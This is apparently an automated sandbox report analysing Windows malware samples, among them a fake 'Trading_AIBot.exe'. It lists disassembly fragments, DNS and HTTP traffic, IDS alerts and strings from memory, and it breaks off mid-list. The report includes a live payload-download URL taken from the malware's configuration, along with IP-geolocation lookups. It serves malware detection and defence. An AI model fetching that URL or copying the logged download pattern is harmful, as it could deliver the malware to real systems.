                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 021C7394h8_2_021C7099
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 021C78DCh8_2_021C767A
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h8_2_021C7E60
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h8_2_021C7E5F
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h8_2_021C7FBC
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 02D09731h9_2_02D09480
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 02D09E5Ah9_2_02D09A40
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 02D09E5Ah9_2_02D09A30
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 02D09E5Ah9_2_02D09D87
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A38830h9_2_05A38588
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A347C9h9_2_05A34520
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A376D0h9_2_05A37428
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A3F700h9_2_05A3F458
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A3E9F8h9_2_05A3E750
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A35929h9_2_05A35680
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A3E5A0h9_2_05A3E180
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A383D8h9_2_05A38130
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A3F2A8h9_2_05A3F000
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A354D1h9_2_05A35228
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A37278h9_2_05A37268
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A35079h9_2_05A34DD0
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A37F80h9_2_05A37CD8
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A34C21h9_2_05A34978
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A3FB58h9_2_05A3F8B0
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A37B28h9_2_05A37880
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A3EE50h9_2_05A3EBA8
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05A35E15h9_2_05A35AD8

                            Networking

                            barindex
                            Source: Malware configuration extractorURLs: https://lwaziacademy.com/wps/200_Oupzhkprnvw
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027DE2F8 InternetCheckConnectionA,4_2_027DE2F8
                            Source: global trafficTCP traffic: 192.168.2.5:52376 -> 162.159.36.2:53
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                            Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                            Source: Joe Sandbox ViewASN Name: GridhostZA GridhostZA
                            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: unknownDNS query: name: reallyfreegeoip.org
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 41.185.8.252:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 158.101.44.242:80
                            Source: global trafficHTTP traffic detected: GET /wps/200_Oupzhkprnvw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lwaziacademy.com
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.0
                            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET /wps/200_Oupzhkprnvw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lwaziacademy.com
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficDNS traffic detected: DNS query: lwaziacademy.com
                            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                            Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                            Source: global trafficDNS traffic detected: DNS query: 212.20.149.52.in-addr.arpa
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                            Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                            Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                            Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                            Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                            Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                            Source: rpkhzpuO.pif, 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                            Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2062232387.000000007ECEA000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.000000002069D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2098429794.00000000218E0000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp, rpkhzpuO.pif.4.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                            Source: powershell.exe, 0000000A.00000002.2166666911.0000000003397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                            Source: powershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2062232387.000000007ECEA000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.000000002069D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2098429794.00000000218E0000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, rpkhzpuO.pif, 